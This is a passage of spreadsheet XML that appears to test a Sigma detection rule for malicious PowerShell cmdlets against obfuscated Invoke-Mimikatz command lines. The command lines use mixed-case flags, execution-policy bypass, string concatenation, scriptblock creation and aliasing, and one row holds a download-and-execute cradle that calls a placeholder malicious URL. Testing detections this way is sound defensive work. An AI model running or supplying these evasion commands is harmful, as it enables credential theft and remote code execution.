      <c r="F2781" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278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81" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2781" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2782" ht="15.75" customHeight="1" s="42">
      <c r="A2782" s="43" t="n"/>
      <c r="B2782" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2782" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2782" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2782" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2782" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278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82" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2782" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2783" ht="15.75" customHeight="1" s="42">
      <c r="A2783" s="43" t="n"/>
      <c r="B2783" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2783" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2783" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2783" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2783" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278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783" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2783" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2784" ht="15.75" customHeight="1" s="42">
      <c r="A2784" s="43" t="n"/>
      <c r="B2784" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2784" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2784" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2784" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2784" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278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84" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2784" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2785" ht="15.75" customHeight="1" s="42">
      <c r="A2785" s="43" t="n"/>
      <c r="B2785" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2785" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2785" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2785" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2785" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278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785" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2785" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2786" ht="15.75" customHeight="1" s="42">
      <c r="A2786" s="43" t="n"/>
      <c r="B2786" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2786" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2786" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2786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786" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2786" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2786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86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2786" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2787" ht="15.75" customHeight="1" s="42">
      <c r="A2787" s="43" t="n"/>
      <c r="B2787" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2787" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2787" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2787" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F2787" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2787" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2787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87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2787" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2788" ht="15.75" customHeight="1" s="42">
      <c r="A2788" s="43" t="n"/>
      <c r="B2788" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2788" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2788" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2788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788" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2788" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2788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788" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2788" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2789" ht="15.75" customHeight="1" s="42">
      <c r="A2789" s="43" t="n"/>
      <c r="B2789" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2789" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2789" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2789" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2789" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2789" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2789" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2789" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2789" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2790" ht="15.75" customHeight="1" s="42">
      <c r="A2790" s="43" t="n"/>
      <c r="B2790" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2790" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2790" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2790" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2790" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2790" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2790" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2790" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2790" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2791" ht="15.75" customHeight="1" s="42">
      <c r="A2791" s="43" t="n"/>
      <c r="B2791" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2791" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2791" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2791" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2791" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2791" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2791" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2791" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2791" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2792" ht="15.75" customHeight="1" s="42">
      <c r="A2792" s="43" t="n"/>
      <c r="B2792" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2792" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2792" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2792" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2792" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2792" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2792" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2792" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2792" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2793" ht="15.75" customHeight="1" s="42">
      <c r="A2793" s="43" t="n"/>
      <c r="B2793" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2793" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2793" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2793" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2793" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2793" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2793" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2793" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2793" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2794" ht="15.75" customHeight="1" s="42">
      <c r="A2794" s="43" t="n"/>
      <c r="B2794" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2794" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2794" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2794" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2794" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2794" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2794" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2795" ht="15.75" customHeight="1" s="42">
      <c r="A2795" s="43" t="n"/>
      <c r="B2795" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2795" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2795" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2795" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2795" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2795" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2795" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2795" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2795" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2796" ht="15.75" customHeight="1" s="42">
      <c r="A2796" s="43" t="n"/>
      <c r="B2796" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2796" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2796" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2796" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2796" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2796" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2796" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2796" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2796" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2797" ht="15.75" customHeight="1" s="42">
      <c r="A2797" s="43" t="n"/>
      <c r="B2797" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2797" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2797" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2797" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2797" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2797" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2797" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2797" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2797" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2798" ht="15.75" customHeight="1" s="42">
      <c r="A2798" s="43" t="n"/>
      <c r="B2798" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2798" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2798" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2798" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2798" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2798" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2798" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2798" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2798" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2798" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2799" ht="15.75" customHeight="1" s="42">
      <c r="A2799" s="43" t="n"/>
      <c r="B2799" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2799" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2799" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2799" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2799" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2799" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2799" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2799" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2799" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2800" ht="15.75" customHeight="1" s="42">
      <c r="A2800" s="43" t="n"/>
      <c r="B2800" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2800" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2800" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2800" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2800" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2800" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2800" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2800" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2800" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2801" ht="15.75" customHeight="1" s="42">
      <c r="A2801" s="43" t="n"/>
      <c r="B2801" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2801" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2801" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2801" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2801" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I280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01" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2801" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2802" ht="15.75" customHeight="1" s="42">
      <c r="A2802" s="43" t="n"/>
      <c r="B2802" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2802" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2802" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2802" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2802" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I280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02" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2802" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2803" ht="15.75" customHeight="1" s="42">
      <c r="A2803" s="43" t="n"/>
      <c r="B2803" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2803" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2803" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2803" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2803" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I280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03" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2803" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2804" ht="15.75" customHeight="1" s="42">
      <c r="A2804" s="43" t="n"/>
      <c r="B2804" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2804" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2804" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2804" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2804" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I280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04" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2804" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2805" ht="15.75" customHeight="1" s="42">
      <c r="A2805" s="44" t="n"/>
      <c r="B2805" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2805" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2805" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2805" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2805" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2805" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2805" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2805" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2805" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2805" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2806" ht="15.75" customHeight="1" s="42">
      <c r="A2806" s="44" t="n"/>
      <c r="B2806" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2806" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2806" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2806" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2806" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2806" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2806" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2806" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2806" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2806" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2807" ht="15.75" customHeight="1" s="42">
      <c r="A2807" s="43" t="n"/>
      <c r="B2807" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2807" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2807" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2807" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2807" s="43" t="b">
        <v>1</v>
      </c>
